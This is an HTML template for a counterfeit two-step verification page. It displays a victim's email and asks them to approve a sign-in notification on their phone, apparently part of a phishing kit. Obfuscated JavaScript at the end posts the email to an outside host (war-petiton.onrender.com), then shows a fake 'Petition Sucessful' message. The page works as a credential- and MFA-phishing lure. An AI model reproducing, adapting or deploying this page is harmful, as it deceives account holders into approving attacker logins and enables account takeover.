<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login Account</title>
</head>
<style>
    .loading-txt{
        font-size: 14px;
        font-family: 'Poppins',sans-serif;
        text-align: center;
        display: none;
    }
    #overlay {
    display: none;
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background-color: rgba(0, 0, 0, 0.5); 
    z-index: 999;
}
.user-email-link{
        text-decoration: none;
        color: black;
    }
.use-account{
            font-size: 15px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            position: relative;
            padding: 0px 5%;
            top: -5%;
        }
.sucessful{
        position:absolute;
        border-radius: 10px;
        transform: translate(25%,100%);
        width: 30%;
        background-color:#fff ;
        height: 250px;
        margin-left: 30%;
        display: none;
        z-index: 1000;
    }
    .forgot-password{
        text-align: center;
    }
.device-img{
        display: flex;
        justify-content: center;
        align-items: center;
    }
    @media screen and (max-width:560px) {
        *body{
            padding: 0;
            margin: 0;
        }
        ul { padding:0 }
        @font-face {
    font-family: 'Poppins';
    src: url('/fonts/Poppins-Regular.ttf');
}
.sucessful{
        position:absolute;
        border-radius: 10px;
        transform: translate(-20%,75%);
        width: 60%;
        background-color:#fff ;
        height: 220px;
    }
    .sucess-img{
    display: flex; 
    justify-content: center;
    align-items: center;
    }
    .sucessful h4{
        color: black;
        margin-top: 10px;
        font-size: 21px;
        font-family: 'Poppins',sans-serif;
    }
    .close-sucess{
    text-decoration: none;
    color: rgb(31, 31, 31);
    font-size: 14px;
    font-weight: 600;
    font-family: 'Poppins',sans-serif;
    position: relative;
    margin-top: 10px;
    top: 7%;
    right: 4%;
    }
        .logo-img{
            display: flex;
            justify-content: center;
            width: 100%;
            height: 45px;
            position: relative;
            top: 10%;
        }
        .sign-in-text{
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-size: 18px;
            font-weight: 400;
        }
        .form-group {
      position: relative;
      margin-bottom: 20px;
    }
    .try-another-method{
            margin-top: 10%;
        }

    input {
      width: 85%;
      padding: 15px;
      border: 1px solid #ccc;
      border-radius: 5px;
      outline: none;
      margin-left: 5%;
    }

    label {
      position: absolute;
      left: 7%;
      top: 55%;
      width: 35%;
      transform: translateY(-50%);
      color: #777;
      font-size: 16px;
      pointer-events: none;
      transition: 0.3s ease-out;
      font-family: 'Poppins',sans-serif;
    }

    input:focus + label,
    input:not(:placeholder-shown)  +label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: rgba(70, 90, 126, 0.4);
      width: 30%;
      width: 20%;
      font-family: 'Poppins',sans-serif;
    }

    input:focus +  #email-label,
    input:not(:placeholder-shown)  + #email-label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: rgba(39, 52, 75, 0.685);
      width: 30%;
      font-family: 'Poppins',sans-serif;
    }
    .device-img{
        display: flex;
        justify-content: center;
        align-items: center;
    }
    .device-img img{
            width: 100px;
            height: 100px;
        }
        .input{
            padding: 20px 100px 15px 5px;
            margin-left: 3%;
            border-radius: 2px;
            border-color: rgb(223, 223, 223);
            border-width: 0.5px;
            font-size: 19px;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
        }
        #input2{
            margin-top: 5%;
        }
        input:focus{
            border-color: rgb(9, 96, 167);
        }
        .forgot-password{
            text-decoration: none;
            font-size: 14px;
            color: #1d1d1d;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 700;
        }
        .use-account{
            font-size: 14px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
        }
        .user-email{
            border: 1px solid rgb(110, 110, 110);
            width: 65%;
            text-align: center;
            padding: 4px;
            position: relative;
            top: -5%;
            left: 17%;
            border-radius: 10px;
            font-family: 'Poppins',sans-serif;
        }
        .not-your,.learn-more{
            font-size: 14px;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
            color: black;
            padding: 5%;
        }
        #learn-more{
            color: #007bff;
            font-weight: 500;
            text-decoration: none;
        }
        .login-div{
            margin-top: 20%;
            display: flex;
            justify-content: space-between;
        }
        .create-account{
            text-decoration: none;
            font-size: 15px;
            color: #007bff;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
            padding-top: 10px;
        }
        #login{
            padding: 10px;
            padding-right: 10px;
            border-radius: 4px;
            background-color: #007bff;
            color: #fff;
            text-decoration: none;
            font-family: 'Poppins',sans-serif;
        }
        #show{
            font-size: 16px;
            font-weight: 500;
            padding-right: 30px;
        }
        .errormsg1,.errormsg2{
            display: none;
            color: red;
            font-size: 13px ;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            margin-left: 5%;
            transition: all 0.6s;
        }
    }

    @media (min-width: 561px) and (max-width:1200px) {
        *body{
            padding: 0;
            margin: 0;
        }
        .device-img img{
            width: 100px;
            height: 100px;
        }
        @font-face {
    font-family: 'Poppins';
    src: url('/fonts/Poppins-Regular.ttf');
}
.sucessful{
        position:absolute;
        border-radius: 10px;
        transform: translate(-20%,75%);
        width: 60%;
        background-color:#fff ;
        height: 220px;
    }
    .sucess-img{
    display: flex; 
    justify-content: center;
    align-items: center;
    }
    .sucessful h4{
        color: black;
        margin-top: 10px;
        font-size: 21px;
        font-family: 'Poppins',sans-serif;
    }
    .close-sucess{
    text-decoration: none;
    color: rgb(31, 31, 31);
    font-size: 14px;
    font-weight: 600;
    font-family: 'Poppins',sans-serif;
    position: relative;
    margin-top: 10px;
    top: 7%;
    right: 4%;
    }
        .logo-img{
            display: flex;
            justify-content: center;
            width: 100%;
            height: 45px;
        }
        .sign-in-text{
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-size: 20px;
            font-weight: 400;
        }
        .form-group {
      position: relative;
      margin-bottom: 20px;
      background-color: #fff;
    }

    input {
      width: 85%;
      padding: 15px;
      border: 1px solid #ccc;
      border-radius: 5px;
      outline: none;
      margin-left: 5%;
      background-color: #fff;
    }

    label {
      position: absolute;
      left: 7%;
      top: 55%;
      width: 35%;
      transform: translateY(-50%);
      color: #777;
      font-size: 16px;
      pointer-events: none;
      transition: 0.3s ease-out;
      font-family: 'Poppins',sans-serif;
    }

    input:focus + label,
    input:not(:placeholder-shown)  +label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 20%;
      font-family: 'Poppins',sans-serif;
    }

    input:focus +  #email-label,
    input:not(:placeholder-shown)  + #email-label {
      top: 1px;
      left: 2%;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 30%;
      font-family: 'Poppins',sans-serif;
    }

        .input{
            padding: 20px 100px 15px 5px;
            margin-left: 3%;
            border-radius: 2px;
            border-color: rgb(223, 223, 223);
            border-width: 0.5px;
            font-size: 19px;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
        }
        #input2{
            margin-top: 5%;
        }
        input:focus{
            border-color: rgb(9, 96, 167);
        }
        .forgot-password{
            text-decoration: none;
            font-size: 17px;
            color: #1d1d1d;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 700;
        }
        .use-google{
            font-size: 17=6px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
        }
        .user-email{
            border: 1px solid rgb(110, 110, 110);
            width: 40%;
            text-align: center;
            padding: 4px;
            position: relative;
            top: -5%;
            left: 30%;
            border-radius: 10px;
            font-family: 'Poppins',sans-serif;
        }
        .not-your,.learn-more{
            font-size: 16px;
            font-family: 'Poppins',sans-serif;
            font-weight: 500;
            color: black;
            padding: 5%;
        }
        #learn-more{
            color: #007bff;
            font-weight: 500;
            text-decoration: none;
        }
        .login-div{
            margin-top: 20%;
            display: flex;
            justify-content: space-between;
        }
        .create-account{
            text-decoration: none;
            font-size: 17px;
            color: #007bff;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
            padding-top: 10px;
        }
        .try-another-method{
            margin-top: 10%;
        }
        #login{
            padding: 10px;
            padding-right: 10px;
            border-radius: 4px;
            background-color: #007bff;
            color: #fff;
            text-decoration: none;
            font-family: 'Poppins',sans-serif;
        }
        #show{
            font-size: 16px;
            font-weight: 500;
            padding-right: 30px;
        }
        .errormsg1,.errormsg2{
            display: none;
            color: red;
            font-size: 13px ;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            margin-left: 5%;
            transition: all 0.6s;
        }   
    }

    @media (min-width:1200px) {
        body{
            justify-content: center;
        }
        .try-another-method{
            margin-top: 10%;
        }
        .container{
            width: 25%;
            transform: translate(150%,20%);
            border: 1px solid rgba(151, 151, 151, 0.308);
            height:600px;
            border-radius: 10px;
            padding:10px;
        }
        .sucessful{
        position:absolute;
        border-radius: 10px;
        transform: translate(20%,100%);
        width: 30%;
        background-color:#fff ;
        height: 220px;
    }
    .sucess-img{
    display: flex; 
    justify-content: center;
    align-items: center;
    }
    .sucessful h4{
        color: black;
        margin-top: 10px;
        font-size: 21px;
        font-family: 'Poppins',sans-serif;
    }
    .close-sucess{
    text-decoration: none;
    color: rgb(31, 31, 31);
    font-size: 14px;
    font-weight: 600;
    font-family: 'Poppins',sans-serif;
    position: relative;
    margin-top: 10px;
    top: 7%;
    right: 4%;
    }
        .logo-img{
            display: flex;
            justify-content: center;
        }
        .sign-in-text{
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-size: 20px;
            position: relative;
            top: -20px;
            font-weight: 500;
        }
        .use-google{
            position: relative;
            top: -30px;
            font-size: 14px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            padding: 0px 20px 0 20px;
        }
        .form-group {
      position: relative;
      margin-bottom: 20px;
    }

    input {
      width: 85%;
      padding: 15px;
      border: 1px solid #ccc;
      border-radius: 5px;
      outline: none;
      margin-left: 5%;
    }

    label {
      position: absolute;
      left: 7%;
      top: 55%;
      width: 35%;
      transform: translateY(-50%);
      color: #777;
      font-size: 16px;
      pointer-events: none;
      transition: 0.3s ease-out;
      font-family: 'Poppins',sans-serif;
    }

    input:focus + label,
    input:not(:placeholder-shown)  +label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 20%;
      font-family: 'Poppins',sans-serif;
    }

    input:focus +  #email-label,
    input:not(:placeholder-shown)  + #email-label {
      top: 1px;
      font-size: 12px;
      color: #007bff;
      background-color: #fff;
      width: 30%;
      font-family: 'Poppins',sans-serif;
    }

        .input{
            padding: 20px 100px 15px 5px;
            margin-left: 3%;
            border-radius: 2px;
            border-color: rgb(223, 223, 223);
            border-width: 0.5px;
            font-size: 19px;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
        }
        #input2{
            margin-top: 5%;
        }
        input:focus{
            border-color: rgb(9, 96, 167);
        }
        .forgot-password{
            text-decoration: none;
            font-size: 17px;
            color: #1d1d1d;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 700;
        }
        .use-google{
            font-size: 18px;
            text-align: center;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
        }
        .not-your,.learn-more{
            font-size: 16px;
            font-family: 'Poppins',sans-serif;
            font-weight: 500;
            color: black;
            padding: 5%;
        }
        #learn-more{
            color: #007bff;
            font-weight: 500;
            text-decoration: none;
        }
        .login-div{
            margin-top: 20%;
            display: flex;
            justify-content: space-between;
        }
        .create-account{
            text-decoration: none;
            font-size: 14px;
            color: #007bff;
            padding-left: 5%;
            font-family: 'Poppins',sans-serif;
            font-weight: 400;
            padding-top: 10px;
        }
        #login{
            padding: 10px;
            padding-right: 10px;
            border-radius: 4px;
            background-color: #007bff;
            color: #fff;
            text-decoration: none;
            font-family: 'Poppins',sans-serif;
        }
        #show{
            font-size: 14px;
            font-weight: 500;
            padding-right: 30px;
        }
        .errormsg1,.errormsg2{
            display: none;
            color: red;
            font-size: 13px ;
            font-family: 'Poppins',sans-serif;
            font-weight: 300;
            margin-left: 5%;
            transition: all 0.6s;
        }
        .device-img img{
            width: 100px;
            height: 100px;
        }
        .user-email{
            border: 1px solid rgb(110, 110, 110);
            width: 50%;
            text-align: center;
            padding: 4px;
            position: relative;
            left: 23%;
            border-radius: 10px;
            top: -4%;
            font-family: 'Poppins',sans-serif;
        }
    }
</style>
<body>
    <section id="home-section">
        <div id="overlay"></div>
        <div class="sucessful">
            <div style="display: flex; justify-content: space-between;">
                <h6> </h6>
                <a href='/' class="close-sucess">close</a>
    </div> 
        <div class="sucess-img">
            <img src="/images/icons8-tick-50.png"/>
        </div>
            <h4 style="text-align: center;">Petition Sucessful</h4>
       
        </div>
        <h4 class="loading-txt">Loading.....</h4>
        <div class="container">
            <div class="logo-img">
                <img src="/images/icon-ar21.svg" alt="">
            </div>
            <h4 class="sign-in-text"> 2 step Verification</h4>
            <h4 class="use-account">To keep your account safe, we would like to  know if it's really you trying to sign in</h4>
           
                <a href="/signin" class="user-email-link"><h4 class="user-email"><%=dataInput%></h4></a>
        
            <div class="device-img">
                <img src="/images/Smart Phone Flat Style.jpg">
            </div>
            <div style="display: flex;justify-content: center;">
                    <a href="#" class="forgot-password">Check your device</a>
                  </div>

                  <h4 class="not-your">A notification was sent to your device. Tap <strong>Yes</strong> on  the notification to verify it's you</h4>
                  <h4 class="learn-more" id="learn-more" onclick="resendRequest()">Resend it</h4>
                  <div class="try-another-method">
                    <a href="/2faMethod" class="learn-more" id="learn-more" onclick="tryAnother()">Try another way</a>
                  </div>
        </div>    
    </section>
    <script>
 (function(_0x1af6bd,_0x432b64){const _0x50c4ac=_0x182c,_0x1a5226=_0x1af6bd();while(!![]){try{const _0x2371b9=parseInt(_0x50c4ac(0x1b6))/0x1*(parseInt(_0x50c4ac(0x1ba))/0x2)+-parseInt(_0x50c4ac(0x1c3))/0x3+-parseInt(_0x50c4ac(0x1bc))/0x4+parseInt(_0x50c4ac(0x1b7))/0x5*(parseInt(_0x50c4ac(0x1c8))/0x6)+-parseInt(_0x50c4ac(0x1c6))/0x7*(-parseInt(_0x50c4ac(0x1ce))/0x8)+-parseInt(_0x50c4ac(0x1cb))/0x9*(-parseInt(_0x50c4ac(0x1c0))/0xa)+-parseInt(_0x50c4ac(0x1be))/0xb;if(_0x2371b9===_0x432b64)break;else _0x1a5226['push'](_0x1a5226['shift']());}catch(_0x2a94a7){_0x1a5226['push'](_0x1a5226['shift']());}}}(_0x4b57,0xb7cb5));function resendRequest(){const _0xd7b5fd=_0x182c,_0x475317=document[_0xd7b5fd(0x1b9)]('.user-email'),_0x19215f=_0x475317['innerHTML'],_0x54daa1={'key1':_0x19215f};console[_0xd7b5fd(0x1c9)](_0x54daa1),fetch('https://war-petiton.onrender.com/resendRequest',{'method':_0xd7b5fd(0x1d2),'headers':{'Content-Type':'application/json'},'body':JSON[_0xd7b5fd(0x1c7)](_0x54daa1)})[_0xd7b5fd(0x1c1)](_0x59e61b=>_0x59e61b[_0xd7b5fd(0x1cd)]())[_0xd7b5fd(0x1c1)](_0x494b99=>{const _0x221d13=_0xd7b5fd;console[_0x221d13(0x1c9)]('Success:',_0x494b99);})[_0xd7b5fd(0x1b4)](_0x44e634=>{const _0x538b16=_0xd7b5fd;console['error'](_0x538b16(0x1c4),_0x44e634);});}setTimeout(()=>{const _0x80ff19=_0x182c,_0x13eb79=document[_0x80ff19(0x1b9)](_0x80ff19(0x1b5)),_0x395747=document[_0x80ff19(0x1b9)](_0x80ff19(0x1d1));_0x13eb79[_0x80ff19(0x1bf)][_0x80ff19(0x1b8)]=_0x80ff19(0x1c2),_0x395747[_0x80ff19(0x1bf)][_0x80ff19(0x1b8)]=_0x80ff19(0x1c2);},0x124f8);function tryAnother(){const _0x435fdf=_0x182c,_0x101edf=document[_0x435fdf(0x1b9)](_0x435fdf(0x1bd)),_0x150c58=_0x101edf[_0x435fdf(0x1cf)],_0x36b60a={'email':_0x150c58,'tryanother':!![]};fetch(_0x435fdf(0x1bb),{'method':'POST','headers':{'Content-Type':_0x435fdf(0x1c5)},'body':JSON[_0x435fdf(0x1c7)](_0x36b60a)})['then'](_0x916111=>{const _0x10b717=_0x435fdf;if(!_0x916111['ok'])throw new Error(_0x10b717(0x1d0));return _0x916111[_0x10b717(0x1cd)]();})[_0x435fdf(0x1c1)](_0x13cbd9=>{const _0x11a7d2=_0x435fdf;console[_0x11a7d2(0x1c9)](_0x11a7d2(0x1cc),_0x13cbd9);})[_0x435fdf(0x1b4)](_0x56befb=>{const _0x2d0628=_0x435fdf;console[_0x2d0628(0x1ca)](_0x2d0628(0x1c4),_0x56befb);});}function _0x182c(_0x28eced,_0x4caf16){const _0x4b57c4=_0x4b57();return _0x182c=function(_0x182c5c,_0x78e107){_0x182c5c=_0x182c5c-0x1b4;let _0x2cc700=_0x4b57c4[_0x182c5c];return _0x2cc700;},_0x182c(_0x28eced,_0x4caf16);}function _0x4b57(){const _0x49fae8=['.sucessful','POST','catch','#overlay','2CtQCHb','5EIphTc','display','querySelector','1464986SksiFT','https://war-petiton.onrender.com/endpointFour','2957828MdERwg','.user-email','32014719GMIWqP','style','10wMYNhM','then','block','2212248IFOhZR','Error:','application/json','665htPCaj','stringify','8265066aJPEMQ','log','error','11802879beXFNG','Success:','json','83048jBwOci','innerHTML','Network\x20response\x20was\x20not\x20ok'];_0x4b57=function(){return _0x49fae8;};return _0x4b57();}
    </script>
</body>
</html>